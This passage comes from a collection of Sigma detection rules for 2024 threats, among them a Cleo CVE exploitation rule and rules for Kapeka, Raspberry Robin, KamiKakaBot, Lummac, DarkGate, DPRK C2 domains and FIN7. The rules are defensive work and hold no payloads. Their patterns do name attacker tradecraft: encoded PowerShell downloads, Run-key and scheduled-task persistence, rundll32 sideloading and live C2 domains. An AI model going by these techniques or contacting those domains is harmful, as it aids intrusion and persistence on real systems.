    "content": "title: CVE-2024-50623 Exploitation Attempt - Cleo\nid: f007b877-02e3-45b7-8501-1b78c2864029\nstatus: experimental\ndescription: |\n    Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a \"cmd.exe\" process spawning from the Celo software suite with suspicious Powershell commandline.\nreferences:\n    - https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild\nauthor: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson\ndate: 2024-12-09\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1190\n    - cve.2024-50623\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\javaw.exe'\n        ParentCommandLine|contains:\n            - 'Harmony'\n            - 'lexicom'\n            - 'VersaLex'\n            - 'VLTrader'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains:\n            - 'powershell'\n            - ' -enc '\n            - ' -EncodedCommand'\n            - '.Download'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/CSharp-Streamer/image_load_malware_csharp_streamer_dotnet_load.yml",
    "content": "title: Potential CSharp Streamer RAT Loading .NET Executable Image\nid: 6f6afac3-8e7a-4e4b-9588-2608ffe08f82\nstatus: test\ndescription: |\n    Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.\nreferences:\n    - https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/#detections\n    - https://cyber.wtf/2023/12/06/the-csharp-streamer-rat/\nauthor: Luca Di Bartolomeo\ndate: 2024-06-22\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|re: '\\\\AppData\\\\Local\\\\Temp\\\\dat[0-9A-Z]{4}\\.tmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_save_temp.yml",
    "content": "title: DarkGate - Drop DarkGate Loader In C:\\Temp Directory\nid: df49c691-8026-48dd-94d3-4ba6a79102a8\nstatus: test\ndescription: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\\temp folder.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/hackers-exploit-windows-smartscreen-flaw-to-drop-darkgate-malware/\n    - https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html\nauthor: Tomasz Dyduch, Josh Nickels\ndate: 2024-05-31\ntags:\n    - attack.execution\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_filename_suffix:\n        TargetFilename|contains: ':\\temp\\'\n        TargetFilename|endswith:\n            - '.au3'\n            - '\\autoit3.exe'\n    selection_image_suffix:\n        Image|contains: ':\\temp\\'\n        Image|endswith:\n            - '.au3'\n            - '\\autoit3.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely legitimate usage of AutoIT in temp folders.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/Generic/file_event_win_malware_generic_creation_configuration_rats.yml",
    "content": "title: File Creation Related To RAT Clients\nid: 2f3039c8-e8fe-43a9-b5cf-dcd424a2522d\nstatus: experimental\ndescription: |\n    File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.\nreferences:\n    - https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761\n    - https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-12-19\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    # VT Query: behaviour_files:\"\\\\AppData\\\\Roaming\\\\DataLogs\\\\DataLogs.conf\"\n    # VT Query: behaviour_files:\"DataLogs.conf\" or behaviour_files:\"hvnc.conf\" or behaviour_files:\"dcrat.conf\"\n    selection_required:\n        TargetFilename|contains: '\\AppData\\Roaming\\'\n    selection_variants:\n        TargetFilename|contains:\n            - '\\mydata\\'\n            - '\\datalogs\\'\n            - '\\hvnc\\'\n            - '\\dcrat\\'\n        TargetFilename|endswith:\n            - '\\datalogs.conf'\n            - '\\hvnc.conf'\n            - '\\dcrat.conf'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate software creating a file with the same name\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/KamiKakaBot/proc_creation_win_malware_kamikakabot_lnk_lure_execution.yml",
    "content": "title: Potential KamiKakaBot Activity - Lure Document Execution\nid: 24474469-bd80-46cc-9e08-9fbe81bfaaca\nstatus: test\ndescription: |\n    Detects the execution of a Word document via the WinWord Start Menu shortcut.\n    This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.\nreferences:\n    - https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2024-03-22\ntags:\n    - attack.execution\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - '/c '\n            - '.lnk ~'\n            - 'Start Menu\\Programs\\Word'\n        CommandLine|endswith: '.doc'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/KamiKakaBot/proc_creation_win_malware_kamikakabot_schtasks_persistence.yml",
    "content": "title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation\nid: fe9e8ba9-4419-41e6-a574-bd9f7b3af961\nstatus: test\ndescription: |\n    Detects the creation of a schedule task that runs weekly and execute the \"shutdown /l /f\" command.\n    This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.\nreferences:\n    - https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/\n    - https://tria.ge/240123-rapteaahhr/behavioral1\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2024-03-22\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - ' /create '\n            - 'shutdown /l /f'\n            - 'WEEKLY'\n    filter_main_system_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/KamiKakaBot/registry_set_malware_kamikakabot_winlogon_persistence.yml",
    "content": "title: Potential KamiKakaBot Activity - Winlogon Shell Persistence\nid: c9b86500-1ec2-4de6-9120-d744c8fb5caf\nstatus: test\ndescription: |\n    Detects changes to the \"Winlogon\" registry key where a process will set the value of the \"Shell\" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.\nreferences:\n    - https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior\ndate: 2024-03-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n        Details|contains|all:\n            - '-nop -w h'\n            - '$env'\n            - 'explorer.exe'\n            - 'Start-Process'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/Lummac-Stealer/proc_creation_win_malware_lummac_more_vbc.yml",
    "content": "title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe\nid: 19b3806e-46f2-4b4c-9337-e3d8653245ea\nstatus: experimental\ndescription: |\n    Detects the execution of more.com and vbc.exe in the process tree.\n    This behavior was observed by a set of samples related to Lummac Stealer.\n    The Lummac payload is injected into the vbc.exe process.\nreferences:\n    - https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files\n    - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef\n    - https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html\n    - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-12-19\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # VT Query: behaviour_processes:\"C:\\\\Windows\\\\SysWOW64\\\\more.com\" behaviour_processes:\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\vbc.exe\"\n    selection_parent:\n        ParentImage|endswith: '\\more.com'\n    selection_child:\n        - Image|endswith: '\\vbc.exe'\n        - OriginalFileName: 'vbc.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/Raspberry-Robin/image_load_malware_raspberry_robin_side_load_aclui_oleview.yml",
    "content": "title: Potential Raspberry Robin Aclui Dll SideLoading\nid: 0f3a9db2-c17a-480e-a723-d1f1c547ab6a\nstatus: test\ndescription: |\n    Detects potential sideloading of malicious \"aclui.dll\" by OleView.This behavior was observed in Raspberry-Robin variants reported by chekpoint research on Feburary 2024.\nreferences:\n    - https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/\n    - https://globetech.biz/index.php/2023/05/19/evading-edr-by-dll-sideloading-in-csharp/\n    - https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/\n    - https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/\n    - https://strontic.github.io/xcyclopedia/library/aclui.dll-F883E9CA757B622B032FDCA5BF33D0DF.html\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-31\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\OleView.exe'\n        ImageLoaded|endswith: '\\aclui.dll'\n    filter_main_legit_oleview_paths:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Windows Kits\\'\n            - 'C:\\Program Files\\Microsoft SDKs\\'\n    filter_optional_known_oleview_paths:\n        Image|contains: '\\Windows Resource Kit\\'\n    filter_main_is_signed:\n        Signed: 'true'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_rundll32_shell32_cpl_exection.yml",
    "content": "title: Potential Raspberry Robin CPL Execution Activity\nid: 92020b88-9caf-464f-bad8-cd0fb0aa2a81\nstatus: test\ndescription: |\n    Detects the execution of a \".CPL\" file located in the user temp directory via the Shell32 DLL \"Control_RunDLL\" export function.\n    This behavior was observed in multiple Raspberry-Robin variants.\nreferences:\n    - https://tria.ge/240226-fhbe7sdc39/behavioral1\n    - https://bazaar.abuse.ch/browse/signature/RaspberryRobin/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-03-07\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: \"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\xxxx\\AppData\\Local\\Temp\\xxxx.CPL\"\n    selection_parent_img:\n        ParentImage|endswith:\n            - '\\rundll32.exe'\n            - '\\control.exe'\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'shell32.dll'\n            - 'Control_RunDLL'\n            - '.CPL'\n    selection_path:\n        CommandLine|contains: '\\AppData\\Local\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/Raspberry-Robin/registry_set_malware_raspberry_robin_internet_settings_zonemap_tamper.yml",
    "content": "title: Potential Raspberry Robin Registry Set Internet Settings ZoneMap\nid: 16a4c7b3-4681-49d0-8d58-3e9b796dcb43\nstatus: test\ndescription: |\n    Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024.\n    Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.\nreferences:\n    - https://tria.ge/240225-jlylpafb24/behavioral1/analog?main_event=Registry&op=SetValueKeyInt\n    - https://tria.ge/240307-1hlldsfe7t/behavioral2/analog?main_event=Registry&op=SetValueKeyInt\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_ProxyByPass\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_UNCAsIntranet\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_IncludeUnspecifiedLocalSites\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::SecurityPage_AutoDetect\n    - https://bazaar.abuse.ch/browse/signature/RaspberryRobin/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-31\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\n    definition: 'Requirements: The registry key \"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\" and its sub keys must be monitored'\ndetection:\n    selection_registry_image:\n        - Image|contains:\n              - '\\AppData\\Local\\Temp\\'\n              - '\\Downloads\\'\n              - '\\Users\\Public\\'\n              - '\\Windows\\Temp\\'\n        - Image|endswith: '\\control.exe'\n    selection_registry_object:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\'\n    selection_value_enable:\n        TargetObject|endswith:\n            - '\\IntranetName'\n            - '\\ProxyByPass'\n            - '\\UNCAsIntranet'\n        Details|contains: 'DWORD (0x00000001)'\n    selection_value_disable:\n        TargetObject|endswith: '\\AutoDetect'\n        Details|contains: 'DWORD (0x00000000)'\n    condition: all of selection_registry_* and 1 of selection_value_*\nfalsepositives:\n    - Unknown\n# Note: can be upgraded to medium after an initial baseline\nlevel: low\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/Kapeka.md",
    "content": "# Kapeka backdoor\n\nKapeka has been used in assaults against people in Eastern Europe since at least the middle of 2022. Microsoft originally identified the [Kapeka backdoor](https://www.securityweek.com/kapeka-a-new-backdoor-in-sandworms-arsenal-of-aggression/). In a brief explanation released on February 14, 2024, Microsoft referred to this new backdoor as \"KnuckleTouch\" and linked it to a threat actor organization known as SeaShell Blizzard, which is also the name of the notorious Sandworm gang.\n\nHowever, it is the security firm [WithSecure](https://labs.withsecure.com/publications/kapeka) that has conducted an in-depth analysis of Kapeka. WithSecure believes that KnuckleTouch is indeed the same as Kapeka. Their assessment suggests that Kapeka is a tool used by an APT (Advanced Persistent Threat) group. \n\nDespite limited public knowledge about Kapeka, WithSecure has identified its use in specific incidents, particularly in regions like Estonia and Ukraine. Kapeka’s stealth mechanisms allow it to maintain persistence and evade detection. If successfully delivered, it can serve as a powerful tool for long-term cyberespionage.\n\n## Rules\n\n- [Potential Kapeka Decrypted Backdoor Indicator](./file_event_win_malware_kapeka_backdoor_indicators.yml)\n- [Kapeka Backdoor Loaded Via Rundll32.EXE](./image_load_malware_kapeka_backdoor_wll.yml)\n- [Kapeka Backdoor Persistence Activity](./proc_creation_win_malware_kapeka_backdoor_persistence.yml)\n- [Kapeka Backdoor Execution Via RunDLL32.EXE](./proc_creation_win_malware_kapeka_backdoor_rundll32_execution.yml)\n- [Kapeka Backdoor Autorun Persistence](./registry_set_malware_kapeka_backdoor_autorun_persistence.yml)\n- [Kapeka Backdoor Configuration Persistence](./registry_set_malware_kapeka_backdoor_configuration.yml)\n- [Kapeka Backdoor Scheduled Task Creation](./win_security_malware_kapeka_backdoor_scheduled_task_creation.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/file_event_win_malware_kapeka_backdoor_indicators.yml",
    "content": "title: Potential Kapeka Decrypted Backdoor Indicator\nid: 20228d05-dd68-435d-8b4e-e7e64938880c\nstatus: test\ndescription: |\n    Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named \"Microsoft\" within \"CSIDL_COMMON_APPDATA\" or \"CSIDL_LOCAL_APPDATA\", depending on the process privileges.\n    The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a \".wll\" extension to pose as a legitimate file to evade detection.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nauthor: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-03\ntags:\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_generic:\n        TargetFilename|contains:\n            - ':\\ProgramData\\'\n            - '\\AppData\\Local\\'\n        TargetFilename|re: '\\\\[a-zA-Z]{5,6}\\.wll'\n    selection_specific:\n        TargetFilename|endswith:\n            - '\\win32log.exe'\n            - '\\crdss.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/image_load_malware_kapeka_backdoor_wll.yml",
    "content": "title: Kapeka Backdoor Loaded Via Rundll32.EXE\nid: a7e6b1f9-8d2c-4f1e-9a7d-63e4c8a2bf4c\nstatus: test\ndescription: |\n    Detects the Kapeka Backdoor binary being loaded by rundll32.exe.\n    The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-03\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        ImageLoaded|contains:\n            - ':\\ProgramData'\n            - '\\AppData\\Local\\'\n        ImageLoaded|re: '[a-zA-Z]{5,6}\\.wll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/proc_creation_win_malware_kapeka_backdoor_persistence.yml",
    "content": "title: Kapeka Backdoor Persistence Activity\nid: 64a871dd-83f6-4e5f-80fc-5a7ca3a8a819\nstatus: test\ndescription: |\n    Detects Kapeka backdoor persistence activity.\n    Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not).\n    For the scheduled task, it creates a scheduled task called \"Sens Api\" via schtasks command, which is set to run upon system startup as SYSTEM.\n    To establish persistence through the autorun utility, it adds an autorun entry called \"Sens Api\" under HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run via the \"reg add\" command.\n    Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\n    - https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-03\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_schtasks_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_schtasks_flags:\n        CommandLine|contains|all:\n            - 'create'\n            - 'ONSTART'\n    selection_reg_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_flags:\n        CommandLine|contains|all:\n            - 'add'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n    selection_backdoor_command:\n        CommandLine|contains|all:\n            - 'rundll32'\n            - '.wll'\n            - '#1'\n        CommandLine|contains:\n            - 'Sens Api'\n            - 'OneDrive' # The scheduled task was called \"OneDrive\" instead of \"Sens Api\" in some cases\n    condition: (all of selection_schtasks_* or all of selection_reg_*) and selection_backdoor_command\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/proc_creation_win_malware_kapeka_backdoor_rundll32_execution.yml",
    "content": "title: Kapeka Backdoor Execution Via RunDLL32.EXE\nid: e98f741c-6a5b-4c83-bc2a-1f4e58d07b12\nstatus: test\ndescription: |\n    Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a \"-d\" argument.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nauthor: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-03\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_backdoor_path:\n        CommandLine|contains:\n            - ':\\ProgramData'\n            - '\\AppData\\Local'\n    selection_backdoor_exec_1:\n        CommandLine|contains|all:\n            - '.wll'\n            - '#1'\n            - ' -d'\n    selection_backdoor_exec_2:\n        # This account for the in the wild variant\n        CommandLine|contains: '.wll'\n        CommandLine|endswith: '#1'\n    condition: selection_img and selection_backdoor_path and 1 of selection_backdoor_exec_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/registry_set_malware_kapeka_backdoor_autorun_persistence.yml",
    "content": "title: Kapeka Backdoor Autorun Persistence\nid: c0c67b21-eb8a-4c84-a395-40473ec3b482\nrelated:\n    - id: 64a871dd-83f6-4e5f-80fc-5a7ca3a8a819\n      type: similar\nstatus: test\ndescription: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'\n        TargetObject|endswith:\n            - '\\Sens Api'\n            - '\\OneDrive'\n        Details|contains|all:\n            - ':\\WINDOWS\\system32\\rundll32.exe'\n            - '.wll'\n            - '#1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/registry_set_malware_kapeka_backdoor_configuration.yml",
    "content": "title: Kapeka Backdoor Configuration Persistence\nid: cbaa3ef3-07a9-4c8e-82d1-9e40578da7fd\nstatus: test\ndescription: |\n    Detects registry set activity of a value called \"Seed\" stored in the \"\\Cryptography\\Providers\\\" registry key.\n    The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1553.003\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\{'\n        TargetObject|endswith: '\\Seed'\n    filter_main_empty:\n        Details|contains: '(Empty)'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/win_security_malware_kapeka_backdoor_scheduled_task_creation.yml",
    "content": "title: Kapeka Backdoor Scheduled Task Creation\nid: 6c130acd-0adb-4545-bcc4-2e85d0883c9a\nrelated:\n    - id: 64a871dd-83f6-4e5f-80fc-5a7ca3a8a819\n      type: similar\nstatus: test\ndescription: Detects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\n    - https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-03\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1053.005\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to trigger this detection.'\ndetection:\n    selection_eid:\n        EventID: 4698\n    selection_paths:\n        TaskContent|contains:\n            - ':\\ProgramData\\'\n            - '\\AppData\\Local\\'\n    selection_command:\n        TaskContent|contains|all:\n            - 'rundll32'\n            - '.wll'\n            - '#1'\n    selection_taskname:\n        TaskContent|contains:\n            - 'OneDrive' # The scheduled task was called “OneDrive” instead of “Sens Api” in some cases\n            - 'Sens Api'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/DPRK/dns_query_win_apt_dprk_malicious_domains.yml",
    "content": "title: DPRK Threat Actor - C2 Communication DNS Indicators\nid: 4d16c9a6-4362-4863-9940-1dee35f1d70f\nstatus: test\ndescription: Detects DNS queries for C2 domains used by DPRK Threat actors.\nreferences:\n    - https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-20\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName:\n            - 'connection.lockscreen.kro.kr'\n            - 'updating.dothome.co.kr'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/FIN7/proc_creation_win_apt_fin7_exploitation_indicators.yml",
    "content": "title: Potential APT FIN7 Exploitation Activity\nid: 6676896b-2cce-422d-82af-5a1abe65e241\nstatus: test\ndescription: |\n    Detects potential APT FIN7 exploitation activity as reported by Google.\n    In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.\nreferences:\n    - https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7/\nauthor: Alex Walston (@4ayymm)\ndate: 2024-07-29\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_notepad_plus:\n        ParentImage|endswith: '\\notepad++.exe'\n        Image|endswith: '\\cmd.exe'\n    selection_rdpinit:\n        ParentImage|endswith: '\\rdpinit.exe'\n        Image|endswith: '\\notepad++.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Notepad++ can legitimately spawn cmd (Open Containing Folder in CMD)\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/README.md",
